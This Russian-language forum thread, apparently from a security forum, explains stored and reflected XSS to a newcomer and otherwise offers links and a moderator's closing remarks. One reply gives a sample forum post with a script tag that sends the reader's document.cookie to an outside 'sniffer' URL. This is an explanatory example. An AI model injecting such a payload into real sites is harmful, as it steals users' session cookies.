Что такое ксс, и с чем его едят?

Думаю из названия понятно. Надеюсь на вашу помощь!

 

Если коротко, то

XSS(активные и пассивные)

Уязвимости класса xss в сущности сводятся к тому, что пользователь может внедрить в страницу произвольный html-код. Это может случиться если фильтрация вводимых символов организованна некорректно(или её вопще нет).
Часто подобные аттаки организуются через любые поля ввода.Эти уязвимости делятся на две подкатегории: активный xss и пассивный xss.
Ативный xss-исполнение html кода, без "активных" действий пользователя. На примере форума: плохой программист не позаботился о фильтрации html тегов,
тогда злой дядька пишет сообщение
"Привет, какой классный у вас форум <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>"
в результате просмотра этого сообщения пользователем его cookie "уплывут" на "сниффер".
Перейдём к пассивному XSS. Отличается от активного он тем, что для успешного проведения атаки пользователь должен пройти по специально составленной, предложенной ему ссылке, ведущей куда-либо на том же сайте откуда мы хотим увести куки. Обычно для такой атаки используются адресная строка браузера,поле search(работающее методом get),либо фрейм.





Вот тебе ссылка, почитай, там все подробно написано http://www.webfile.ru/1117230

Вот еще http://paradox.3bb.ru/viewtopic.php?pid=43

p.s.а самая главная ссылка это вот

http://www.google.com.ua/search?hl=uk&ie=windows-1251&q=%C2%F1%E5+%EE+XSS&meta=

и

www.google.com\ru\ua
www.ya.ru
www.rambler.ru
www.aport.ru

 

Rtfm!



======

Пока устный выговор. Впредь пиши по сути дела
DRON-ANARCHY

 

вот ссылки на статьи:
http://www.forum.antichat.ru/thread11807.html

http://antichat.ru/crackchat/HTML/

http://forum.antichat.ru/thread20140.html

читай и учи!!! =)

 

да, и еще одна:
http://www2.packetstormsecurity.org

Практика - Лучший учитель...имхо

 

Если я тебя правельно понял, то вот http://www.w3.org/Style/CSS/

А редактировать CSS можно с помощью "офисной утилиты" FrontPage

Ну а если не правельно, то х с ним.

 

Наверно все-таки неправильно...

Если вопрос по каск. таблицам - то это не в тот раздел тема (да и вообще, не в тот форум...)

 

На вопрос ответили с избытком. Привели много ссылок. Теперь только читать и понимать, а тут уже помочь никак. Тема закрыта.
ЗЫ Если будет очень уж большая неоюходимость здесь отпостить, пишите в ПМ, тему открою